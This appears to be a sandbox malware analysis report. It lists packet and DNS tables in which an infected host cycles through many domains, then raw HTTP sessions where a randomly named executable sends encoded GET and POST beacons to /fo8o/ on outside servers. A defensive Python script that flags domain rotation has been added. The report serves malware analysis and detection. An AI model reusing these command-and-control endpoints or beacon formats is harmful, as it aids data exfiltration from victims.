Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                      Dec 2, 2024 14:33:49.835423946 CET805002766.29.149.46192.168.2.6
                                                                                      Dec 2, 2024 14:33:50.947177887 CET805002766.29.149.46192.168.2.6
                                                                                      Dec 2, 2024 14:33:50.947206020 CET805002766.29.149.46192.168.2.6
                                                                                      Dec 2, 2024 14:33:50.947331905 CET5002780192.168.2.666.29.149.46
                                                                                      Dec 2, 2024 14:33:50.951901913 CET5002780192.168.2.666.29.149.46
                                                                                      Dec 2, 2024 14:33:51.071945906 CET805002766.29.149.46192.168.2.6
                                                                                      Dec 2, 2024 14:33:56.969660997 CET5003080192.168.2.6195.110.124.133
                                                                                      Dec 2, 2024 14:33:57.089742899 CET8050030195.110.124.133192.168.2.6
                                                                                      Dec 2, 2024 14:33:57.089838982 CET5003080192.168.2.6195.110.124.133
                                                                                      Dec 2, 2024 14:33:57.091831923 CET5003080192.168.2.6195.110.124.133
                                                                                      Dec 2, 2024 14:33:57.211756945 CET8050030195.110.124.133192.168.2.6
                                                                                      Dec 2, 2024 14:33:58.445168972 CET8050030195.110.124.133192.168.2.6
                                                                                      Dec 2, 2024 14:33:58.445317030 CET8050030195.110.124.133192.168.2.6
                                                                                      Dec 2, 2024 14:33:58.445406914 CET5003080192.168.2.6195.110.124.133
                                                                                      Dec 2, 2024 14:33:58.604823112 CET5003080192.168.2.6195.110.124.133
                                                                                      Dec 2, 2024 14:33:59.624274969 CET5003180192.168.2.6195.110.124.133
                                                                                      Dec 2, 2024 14:33:59.745079041 CET8050031195.110.124.133192.168.2.6
                                                                                      Dec 2, 2024 14:33:59.745409012 CET5003180192.168.2.6195.110.124.133
                                                                                      Dec 2, 2024 14:33:59.747895002 CET5003180192.168.2.6195.110.124.133
                                                                                      Dec 2, 2024 14:33:59.868074894 CET8050031195.110.124.133192.168.2.6
                                                                                      Dec 2, 2024 14:34:01.055336952 CET8050031195.110.124.133192.168.2.6
                                                                                      Dec 2, 2024 14:34:01.055370092 CET8050031195.110.124.133192.168.2.6
                                                                                      Dec 2, 2024 14:34:01.055454016 CET5003180192.168.2.6195.110.124.133
                                                                                      Dec 2, 2024 14:34:01.261044025 CET5003180192.168.2.6195.110.124.133
                                                                                      Dec 2, 2024 14:34:02.280670881 CET5003280192.168.2.6195.110.124.133
                                                                                      Dec 2, 2024 14:34:02.400774002 CET8050032195.110.124.133192.168.2.6
                                                                                      Dec 2, 2024 14:34:02.400866985 CET5003280192.168.2.6195.110.124.133
                                                                                      Dec 2, 2024 14:34:02.403425932 CET5003280192.168.2.6195.110.124.133
                                                                                      Dec 2, 2024 14:34:02.523330927 CET8050032195.110.124.133192.168.2.6
                                                                                      Dec 2, 2024 14:34:02.523375988 CET8050032195.110.124.133192.168.2.6
                                                                                      Dec 2, 2024 14:34:03.911516905 CET8050032195.110.124.133192.168.2.6
                                                                                      Dec 2, 2024 14:34:03.911758900 CET8050032195.110.124.133192.168.2.6
                                                                                      Dec 2, 2024 14:34:03.914014101 CET5003280192.168.2.6195.110.124.133
                                                                                      Dec 2, 2024 14:34:03.920861006 CET5003280192.168.2.6195.110.124.133
                                                                                      Dec 2, 2024 14:34:04.936822891 CET5003380192.168.2.6195.110.124.133
                                                                                      Dec 2, 2024 14:34:05.056911945 CET8050033195.110.124.133192.168.2.6
                                                                                      Dec 2, 2024 14:34:05.058243990 CET5003380192.168.2.6195.110.124.133
                                                                                      Dec 2, 2024 14:34:05.060287952 CET5003380192.168.2.6195.110.124.133
                                                                                      Dec 2, 2024 14:34:05.180195093 CET8050033195.110.124.133192.168.2.6
                                                                                      Dec 2, 2024 14:34:06.413804054 CET8050033195.110.124.133192.168.2.6
                                                                                      Dec 2, 2024 14:34:06.413897991 CET8050033195.110.124.133192.168.2.6
                                                                                      Dec 2, 2024 14:34:06.414053917 CET5003380192.168.2.6195.110.124.133
                                                                                      Dec 2, 2024 14:34:06.423911095 CET5003380192.168.2.6195.110.124.133
                                                                                      Dec 2, 2024 14:34:06.543922901 CET8050033195.110.124.133192.168.2.6
                                                                                      Dec 2, 2024 14:34:28.685940027 CET5003580192.168.2.6217.196.55.202
                                                                                      Dec 2, 2024 14:34:28.806118011 CET8050035217.196.55.202192.168.2.6
                                                                                      Dec 2, 2024 14:34:28.806199074 CET5003580192.168.2.6217.196.55.202
                                                                                      Dec 2, 2024 14:34:28.844506979 CET5003580192.168.2.6217.196.55.202
                                                                                      Dec 2, 2024 14:34:28.964454889 CET8050035217.196.55.202192.168.2.6
                                                                                      Dec 2, 2024 14:34:30.103638887 CET8050035217.196.55.202192.168.2.6
                                                                                      Dec 2, 2024 14:34:30.103842020 CET8050035217.196.55.202192.168.2.6
                                                                                      Dec 2, 2024 14:34:30.103930950 CET5003580192.168.2.6217.196.55.202
                                                                                      Dec 2, 2024 14:34:30.386218071 CET5003580192.168.2.6217.196.55.202
                                                                                      Dec 2, 2024 14:34:31.411987066 CET5003680192.168.2.6217.196.55.202
                                                                                      Dec 2, 2024 14:34:31.533271074 CET8050036217.196.55.202192.168.2.6
                                                                                      Dec 2, 2024 14:34:31.540055990 CET5003680192.168.2.6217.196.55.202
                                                                                      Dec 2, 2024 14:34:31.550024033 CET5003680192.168.2.6217.196.55.202
                                                                                      Dec 2, 2024 14:34:31.670187950 CET8050036217.196.55.202192.168.2.6
                                                                                      Dec 2, 2024 14:34:32.744534969 CET8050036217.196.55.202192.168.2.6
                                                                                      Dec 2, 2024 14:34:32.744827032 CET8050036217.196.55.202192.168.2.6
                                                                                      Dec 2, 2024 14:34:32.744920015 CET5003680192.168.2.6217.196.55.202
                                                                                      Dec 2, 2024 14:34:33.075998068 CET5003680192.168.2.6217.196.55.202
                                                                                      Dec 2, 2024 14:34:34.093709946 CET5003780192.168.2.6217.196.55.202
                                                                                      Dec 2, 2024 14:34:34.213860989 CET8050037217.196.55.202192.168.2.6
                                                                                      Dec 2, 2024 14:34:34.213968992 CET5003780192.168.2.6217.196.55.202
                                                                                      Dec 2, 2024 14:34:34.216739893 CET5003780192.168.2.6217.196.55.202
                                                                                      Dec 2, 2024 14:34:34.336711884 CET8050037217.196.55.202192.168.2.6
                                                                                      Dec 2, 2024 14:34:34.336798906 CET8050037217.196.55.202192.168.2.6
                                                                                      Dec 2, 2024 14:34:35.467267036 CET8050037217.196.55.202192.168.2.6
                                                                                      Dec 2, 2024 14:34:35.467276096 CET8050037217.196.55.202192.168.2.6
                                                                                      Dec 2, 2024 14:34:35.467375040 CET5003780192.168.2.6217.196.55.202
                                                                                      Dec 2, 2024 14:34:35.729967117 CET5003780192.168.2.6217.196.55.202
                                                                                      Dec 2, 2024 14:34:36.749034882 CET5003880192.168.2.6217.196.55.202
                                                                                      Dec 2, 2024 14:34:36.869149923 CET8050038217.196.55.202192.168.2.6
                                                                                      Dec 2, 2024 14:34:36.869993925 CET5003880192.168.2.6217.196.55.202
                                                                                      Dec 2, 2024 14:34:36.871335030 CET5003880192.168.2.6217.196.55.202
                                                                                      Dec 2, 2024 14:34:36.991247892 CET8050038217.196.55.202192.168.2.6
                                                                                      Dec 2, 2024 14:34:38.077128887 CET8050038217.196.55.202192.168.2.6
                                                                                      Dec 2, 2024 14:34:38.077157021 CET8050038217.196.55.202192.168.2.6
                                                                                      Dec 2, 2024 14:34:38.077853918 CET8050038217.196.55.202192.168.2.6
                                                                                      Dec 2, 2024 14:34:38.079364061 CET5003880192.168.2.6217.196.55.202
                                                                                      Dec 2, 2024 14:34:38.079364061 CET5003880192.168.2.6217.196.55.202
                                                                                      Dec 2, 2024 14:34:38.079775095 CET5003880192.168.2.6217.196.55.202
                                                                                      Dec 2, 2024 14:34:38.199774027 CET8050038217.196.55.202192.168.2.6
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 2, 2024 14:31:12.193627119 CET | 57906 | 53 | 192.168.2.6 | 1.1.1.1
Dec 2, 2024 14:31:13.197897911 CET | 57906 | 53 | 192.168.2.6 | 1.1.1.1
Dec 2, 2024 14:31:13.216698885 CET | 53 | 57906 | 1.1.1.1 | 192.168.2.6
Dec 2, 2024 14:31:13.337250948 CET | 53 | 57906 | 1.1.1.1 | 192.168.2.6
Dec 2, 2024 14:31:29.982498884 CET | 57273 | 53 | 192.168.2.6 | 1.1.1.1
Dec 2, 2024 14:31:30.382107019 CET | 53 | 57273 | 1.1.1.1 | 192.168.2.6
Dec 2, 2024 14:31:38.435596943 CET | 51872 | 53 | 192.168.2.6 | 1.1.1.1
Dec 2, 2024 14:31:39.214294910 CET | 53 | 51872 | 1.1.1.1 | 192.168.2.6
Dec 2, 2024 14:31:53.904438019 CET | 54905 | 53 | 192.168.2.6 | 1.1.1.1
Dec 2, 2024 14:31:54.315913916 CET | 53 | 54905 | 1.1.1.1 | 192.168.2.6
Dec 2, 2024 14:32:02.373877048 CET | 61877 | 53 | 192.168.2.6 | 1.1.1.1
Dec 2, 2024 14:32:03.104346991 CET | 53 | 61877 | 1.1.1.1 | 192.168.2.6
Dec 2, 2024 14:33:17.704485893 CET | 50209 | 53 | 192.168.2.6 | 1.1.1.1
Dec 2, 2024 14:33:18.077753067 CET | 53 | 50209 | 1.1.1.1 | 192.168.2.6
Dec 2, 2024 14:33:32.767770052 CET | 55553 | 53 | 192.168.2.6 | 1.1.1.1
Dec 2, 2024 14:33:32.995378017 CET | 53 | 55553 | 1.1.1.1 | 192.168.2.6
Dec 2, 2024 14:33:41.062621117 CET | 58804 | 53 | 192.168.2.6 | 1.1.1.1
Dec 2, 2024 14:33:41.623344898 CET | 53 | 58804 | 1.1.1.1 | 192.168.2.6
Dec 2, 2024 14:33:55.967844009 CET | 52947 | 53 | 192.168.2.6 | 1.1.1.1
Dec 2, 2024 14:33:56.964209080 CET | 52947 | 53 | 192.168.2.6 | 1.1.1.1
Dec 2, 2024 14:33:56.967350960 CET | 53 | 52947 | 1.1.1.1 | 192.168.2.6
Dec 2, 2024 14:33:57.101702929 CET | 53 | 52947 | 1.1.1.1 | 192.168.2.6
Dec 2, 2024 14:34:11.439871073 CET | 51370 | 53 | 192.168.2.6 | 1.1.1.1
Dec 2, 2024 14:34:11.666167974 CET | 53 | 51370 | 1.1.1.1 | 192.168.2.6
Dec 2, 2024 14:34:19.773674011 CET | 52923 | 53 | 192.168.2.6 | 1.1.1.1
Dec 2, 2024 14:34:19.997265100 CET | 53 | 52923 | 1.1.1.1 | 192.168.2.6
Dec 2, 2024 14:34:28.077369928 CET | 54418 | 53 | 192.168.2.6 | 1.1.1.1
Dec 2, 2024 14:34:28.547454119 CET | 53 | 54418 | 1.1.1.1 | 192.168.2.6
Dec 2, 2024 14:34:43.566107035 CET | 51746 | 53 | 192.168.2.6 | 1.1.1.1
Dec 2, 2024 14:34:43.789280891 CET | 53 | 51746 | 1.1.1.1 | 192.168.2.6
Dec 2, 2024 14:34:52.358592987 CET | 53691 | 53 | 192.168.2.6 | 1.1.1.1
Dec 2, 2024 14:34:52.595752954 CET | 53 | 53691 | 1.1.1.1 | 192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 2, 2024 14:31:12.193627119 CET | 192.168.2.6 | 1.1.1.1 | 0x5eb1 | Standard query (0) | www.3xfootball.com | A (IP address) | IN (0x0001) | false
Dec 2, 2024 14:31:13.197897911 CET | 192.168.2.6 | 1.1.1.1 | 0x5eb1 | Standard query (0) | www.3xfootball.com | A (IP address) | IN (0x0001) | false
Dec 2, 2024 14:31:29.982498884 CET | 192.168.2.6 | 1.1.1.1 | 0x2281 | Standard query (0) | www.kasegitai.tokyo | A (IP address) | IN (0x0001) | false
Dec 2, 2024 14:31:38.435596943 CET | 192.168.2.6 | 1.1.1.1 | 0x9b25 | Standard query (0) | www.goldenjade-travel.com | A (IP address) | IN (0x0001) | false
Dec 2, 2024 14:31:53.904438019 CET | 192.168.2.6 | 1.1.1.1 | 0x88cc | Standard query (0) | www.antonio-vivaldi.mobi | A (IP address) | IN (0x0001) | false
Dec 2, 2024 14:32:02.373877048 CET | 192.168.2.6 | 1.1.1.1 | 0xcfb2 | Standard query (0) | www.magmadokum.com | A (IP address) | IN (0x0001) | false
Dec 2, 2024 14:33:17.704485893 CET | 192.168.2.6 | 1.1.1.1 | 0x77ca | Standard query (0) | www.rssnewscast.com | A (IP address) | IN (0x0001) | false
Dec 2, 2024 14:33:32.767770052 CET | 192.168.2.6 | 1.1.1.1 | 0xb876 | Standard query (0) | www.liangyuen528.com | A (IP address) | IN (0x0001) | false
Dec 2, 2024 14:33:41.062621117 CET | 192.168.2.6 | 1.1.1.1 | 0x4cfd | Standard query (0) | www.techchains.info | A (IP address) | IN (0x0001) | false
Dec 2, 2024 14:33:55.967844009 CET | 192.168.2.6 | 1.1.1.1 | 0xd2bf | Standard query (0) | www.elettrosistemista.zip | A (IP address) | IN (0x0001) | false
Dec 2, 2024 14:33:56.964209080 CET | 192.168.2.6 | 1.1.1.1 | 0xd2bf | Standard query (0) | www.elettrosistemista.zip | A (IP address) | IN (0x0001) | false
Dec 2, 2024 14:34:11.439871073 CET | 192.168.2.6 | 1.1.1.1 | 0x21a | Standard query (0) | www.donnavariedades.com | A (IP address) | IN (0x0001) | false
Dec 2, 2024 14:34:19.773674011 CET | 192.168.2.6 | 1.1.1.1 | 0x4326 | Standard query (0) | www.660danm.top | A (IP address) | IN (0x0001) | false
Dec 2, 2024 14:34:28.077369928 CET | 192.168.2.6 | 1.1.1.1 | 0x6343 | Standard query (0) | www.empowermedeco.com | A (IP address) | IN (0x0001) | false
Dec 2, 2024 14:34:43.566107035 CET | 192.168.2.6 | 1.1.1.1 | 0x2bab | Standard query (0) | www.joyesi.xyz | A (IP address) | IN (0x0001) | false
Dec 2, 2024 14:34:52.358592987 CET | 192.168.2.6 | 1.1.1.1 | 0xddbc | Standard query (0) | www.k9vyp11no3.cfd | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 2, 2024 14:31:13.216698885 CET | 1.1.1.1 | 192.168.2.6 | 0x5eb1 | No error (0) | www.3xfootball.com |  | 154.215.72.110 | A (IP address) | IN (0x0001) | false
Dec 2, 2024 14:31:13.337250948 CET | 1.1.1.1 | 192.168.2.6 | 0x5eb1 | No error (0) | www.3xfootball.com |  | 154.215.72.110 | A (IP address) | IN (0x0001) | false
Dec 2, 2024 14:31:30.382107019 CET | 1.1.1.1 | 192.168.2.6 | 0x2281 | Name error (3) | www.kasegitai.tokyo | none | none | A (IP address) | IN (0x0001) | false
Dec 2, 2024 14:31:39.214294910 CET | 1.1.1.1 | 192.168.2.6 | 0x9b25 | No error (0) | www.goldenjade-travel.com |  | 116.50.37.244 | A (IP address) | IN (0x0001) | false
Dec 2, 2024 14:31:54.315913916 CET | 1.1.1.1 | 192.168.2.6 | 0x88cc | Name error (3) | www.antonio-vivaldi.mobi | none | none | A (IP address) | IN (0x0001) | false
Dec 2, 2024 14:32:03.104346991 CET | 1.1.1.1 | 192.168.2.6 | 0xcfb2 | No error (0) | www.magmadokum.com | redirect.natrocdn.com |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 2, 2024 14:32:03.104346991 CET | 1.1.1.1 | 192.168.2.6 | 0xcfb2 | No error (0) | redirect.natrocdn.com | natroredirect.natrocdn.com |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 2, 2024 14:32:03.104346991 CET | 1.1.1.1 | 192.168.2.6 | 0xcfb2 | No error (0) | natroredirect.natrocdn.com |  | 85.159.66.93 | A (IP address) | IN (0x0001) | false
Dec 2, 2024 14:33:18.077753067 CET | 1.1.1.1 | 192.168.2.6 | 0x77ca | No error (0) | www.rssnewscast.com |  | 91.195.240.94 | A (IP address) | IN (0x0001) | false
Dec 2, 2024 14:33:32.995378017 CET | 1.1.1.1 | 192.168.2.6 | 0xb876 | Name error (3) | www.liangyuen528.com | none | none | A (IP address) | IN (0x0001) | false
Dec 2, 2024 14:33:41.623344898 CET | 1.1.1.1 | 192.168.2.6 | 0x4cfd | No error (0) | www.techchains.info |  | 66.29.149.46 | A (IP address) | IN (0x0001) | false
Dec 2, 2024 14:33:56.967350960 CET | 1.1.1.1 | 192.168.2.6 | 0xd2bf | No error (0) | www.elettrosistemista.zip | elettrosistemista.zip |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 2, 2024 14:33:56.967350960 CET | 1.1.1.1 | 192.168.2.6 | 0xd2bf | No error (0) | elettrosistemista.zip |  | 195.110.124.133 | A (IP address) | IN (0x0001) | false
Dec 2, 2024 14:33:57.101702929 CET | 1.1.1.1 | 192.168.2.6 | 0xd2bf | No error (0) | www.elettrosistemista.zip | elettrosistemista.zip |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 2, 2024 14:33:57.101702929 CET | 1.1.1.1 | 192.168.2.6 | 0xd2bf | No error (0) | elettrosistemista.zip |  | 195.110.124.133 | A (IP address) | IN (0x0001) | false
Dec 2, 2024 14:34:11.666167974 CET | 1.1.1.1 | 192.168.2.6 | 0x21a | Name error (3) | www.donnavariedades.com | none | none | A (IP address) | IN (0x0001) | false
Dec 2, 2024 14:34:19.997265100 CET | 1.1.1.1 | 192.168.2.6 | 0x4326 | Name error (3) | www.660danm.top | none | none | A (IP address) | IN (0x0001) | false
Dec 2, 2024 14:34:28.547454119 CET | 1.1.1.1 | 192.168.2.6 | 0x6343 | No error (0) | www.empowermedeco.com | empowermedeco.com |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 2, 2024 14:34:28.547454119 CET | 1.1.1.1 | 192.168.2.6 | 0x6343 | No error (0) | empowermedeco.com |  | 217.196.55.202 | A (IP address) | IN (0x0001) | false
Dec 2, 2024 14:34:43.789280891 CET | 1.1.1.1 | 192.168.2.6 | 0x2bab | Name error (3) | www.joyesi.xyz | none | none | A (IP address) | IN (0x0001) | false
Dec 2, 2024 14:34:52.595752954 CET | 1.1.1.1 | 192.168.2.6 | 0xddbc | Name error (3) | www.k9vyp11no3.cfd | none | none | A (IP address) | IN (0x0001) | false
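The DNS tables above show one host walking through 14 unrelated names across eight TLDs in under four minutes, half of which do not resolve (Name error (3)). That cadence is the observable a resolver log gives you even when the live C2 host changes. The script below is an added example, not part of the Joe Sandbox report: it parses a simple resolver log, measures how many distinct registrable domains a client touched inside a sliding window, the NXDOMAIN share and the spread of TLDs, and flags the pattern. The sample log is transcribed from the query/answer tables above (retransmitted queries dropped); the benign baseline, the eTLD+1 approximation and every threshold are assumptions.

```python
"""Flag rotation through many unrelated, mostly unregistered domains in a DNS log.

Added example, not part of the sandbox report. SAMPLE_LOG is transcribed from the
DNS tables above; BENIGN_LOG, registrable() and the thresholds are assumptions.
"""
from __future__ import annotations
from collections import namedtuple
from datetime import datetime
from statistics import median

DnsEvent = namedtuple("DnsEvent", "ts name rcode")

# Constructed from the tables above: first query time, queried name, reply code.
SAMPLE_LOG = """\
2024-12-02 14:31:12.193 www.3xfootball.com NOERROR
2024-12-02 14:31:29.982 www.kasegitai.tokyo NXDOMAIN
2024-12-02 14:31:38.435 www.goldenjade-travel.com NOERROR
2024-12-02 14:31:53.904 www.antonio-vivaldi.mobi NXDOMAIN
2024-12-02 14:32:02.373 www.magmadokum.com NOERROR
2024-12-02 14:33:17.704 www.rssnewscast.com NOERROR
2024-12-02 14:33:32.767 www.liangyuen528.com NXDOMAIN
2024-12-02 14:33:41.062 www.techchains.info NOERROR
2024-12-02 14:33:55.967 www.elettrosistemista.zip NOERROR
2024-12-02 14:34:11.439 www.donnavariedades.com NXDOMAIN
2024-12-02 14:34:19.773 www.660danm.top NXDOMAIN
2024-12-02 14:34:28.077 www.empowermedeco.com NOERROR
2024-12-02 14:34:43.566 www.joyesi.xyz NXDOMAIN
2024-12-02 14:34:52.358 www.k9vyp11no3.cfd NXDOMAIN
"""

# Constructed benign baseline: one host using two sites it actually visits.
BENIGN_LOG = """\
2024-12-02 14:31:12.000 www.example.com NOERROR
2024-12-02 14:31:12.300 cdn.example.com NOERROR
2024-12-02 14:31:15.100 api.example.net NOERROR
2024-12-02 14:31:40.000 www.example.com NOERROR
"""


def parse_log(text: str) -> list[DnsEvent]:
    """One event per non-empty line: '<date> <time> <name> <rcode>'."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        date, clock, name, rcode = line.split()
        ts = datetime.strptime(f"{date} {clock}", "%Y-%m-%d %H:%M:%S.%f")
        events.append(DnsEvent(ts, name.lower().rstrip("."), rcode.upper()))
    return sorted(events, key=lambda e: e.ts)


def registrable(name: str) -> str:
    """Approximate eTLD+1 as the last two labels (assumption: no public-suffix list)."""
    labels = name.split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else name


def analyze(events: list[DnsEvent], window_s: float = 300.0) -> dict:
    """Summarise a client's lookups: distinct domains overall and in any window,
    NXDOMAIN share, TLD spread and the median gap between consecutive queries."""
    if not events:
        return {"distinct_domains": 0, "max_in_window": 0, "nxdomain": 0,
                "nxdomain_ratio": 0.0, "tlds": 0, "median_gap_s": 0.0}
    domains = [registrable(e.name) for e in events]
    times = [e.ts.timestamp() for e in events]
    max_in_window = 0
    for i in range(len(events)):          # sliding window over the sorted events
        seen = set()
        for j in range(i, len(events)):
            if times[j] - times[i] > window_s:
                break
            seen.add(domains[j])
        max_in_window = max(max_in_window, len(seen))
    nx = sum(1 for e in events if e.rcode == "NXDOMAIN")
    gaps = [b - a for a, b in zip(times, times[1:])]
    return {
        "distinct_domains": len(set(domains)),
        "max_in_window": max_in_window,
        "nxdomain": nx,
        "nxdomain_ratio": nx / len(events),
        "tlds": len({d.rsplit(".", 1)[-1] for d in domains}),
        "median_gap_s": median(gaps) if gaps else 0.0,
    }


def is_domain_rotation(stats: dict, min_domains: int = 8,
                       min_nx_ratio: float = 0.3, min_tlds: int = 4) -> bool:
    """Assumed thresholds: many unrelated domains in one window, a sizeable share
    unregistered, spread over several TLDs. Tune against your own baseline."""
    return (stats["max_in_window"] >= min_domains
            and stats["nxdomain_ratio"] >= min_nx_ratio
            and stats["tlds"] >= min_tlds)


if __name__ == "__main__":
    for label, log in (("sample", SAMPLE_LOG), ("benign", BENIGN_LOG)):
        stats = analyze(parse_log(log))
        print(label, stats, "-> rotation" if is_domain_rotation(stats) else "-> ok")
```

The window size matters: the sample's 14 names fit in a single five-minute span, but a slower beacon would need a longer window, and a resolver with aggressive negative caching will hide repeated NXDOMAIN hits, so run this over raw client-side query logs rather than cache statistics.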
                                                                                      • www.3xfootball.com
                                                                                      • www.goldenjade-travel.com
                                                                                      • www.magmadokum.com
                                                                                      • www.rssnewscast.com
                                                                                      • www.techchains.info
                                                                                      • www.elettrosistemista.zip
                                                                                      • www.empowermedeco.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49794 | 154.215.72.110 | 80 | 6392 | C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe
Timestamp | Bytes transferred | Direction | Data
Dec 2, 2024 14:31:13.345572948 CET | 525 | OUT | GET /fo8o/?cPm=bL-XkPyPkF&U6YDsxW=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnyIi7V/S5J9AzlXPHqpluzE36hxZsh30r8poflPmNwlfmk35jvL8= HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                      Accept-Language: en-US,en
                                                                                      Host: www.3xfootball.com
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Dec 2, 2024 14:31:14.936794996 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                                      Server: nginx
                                                                                      Date: Mon, 02 Dec 2024 13:31:14 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 548
                                                                                      Connection: close
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      1 | 192.168.2.6 | 49853 | 116.50.37.244 | 80 | 6392 | C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Dec 2, 2024 14:31:39.339704990 CET | 807 | OUT | POST /fo8o/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                      Accept-Language: en-US,en
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Host: www.goldenjade-travel.com
                                                                                      Origin: http://www.goldenjade-travel.com
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 212
                                                                                      Referer: http://www.goldenjade-travel.com/fo8o/
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                      Data Raw: 55 36 59 44 73 78 57 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4b 65 73 4d 4c 77 6e 74 6b 63 45 31 2b 61 49 63 6f 52 36 64 71 4d 45 4c 35 73 65 2f 4a 2f 34 67 4d 70 64 73 71 50 73 32 2f 73 43 39 6a 37 30 39 63 4b 2f 45 2f 7a 69 79 36 4e 4a 44 48 74 37 63 4b 6f 54 4e 62 4e 2f 53 68 78 59 46 6f 58 49 44 71 59 6f 55 62 37 2b 37 47 5a 56 62 57 32 55 47 43 63 58 30 4a 68 4c 59 6e 5a 50 58 32 76 76 30 79 6f 5a 4c 72 4e 6b 43 44 61 4f 77 5a 50 65 6f 6b 33 6c 4c 70 2b 36 45 49 54 62 77 66 66 66 57 47 32 62 66 4f 4f 7a 42 6a 36 4a 36 37 6b 76 66 53 54 37 30 43 57 78 57 66 67 72 67 58 30 55 65 42 5a 37 65 4f 56 45 76 6b 57 45 76 75 30 41 64
                                                                                      Data Ascii: U6YDsxW=GHiKxe4Q6VhKKesMLwntkcE1+aIcoR6dqMEL5se/J/4gMpdsqPs2/sC9j709cK/E/ziy6NJDHt7cKoTNbN/ShxYFoXIDqYoUb7+7GZVbW2UGCcX0JhLYnZPX2vv0yoZLrNkCDaOwZPeok3lLp+6EITbwfffWG2bfOOzBj6J67kvfST70CWxWfgrgX0UeBZ7eOVEvkWEvu0Ad
                                                                                      Dec 2, 2024 14:31:40.857621908 CET | 492 | IN | HTTP/1.1 404 Not Found
                                                                                      Content-Type: text/html; charset=us-ascii
                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                      Date: Mon, 02 Dec 2024 13:31:40 GMT
                                                                                      Connection: close
                                                                                      Content-Length: 315
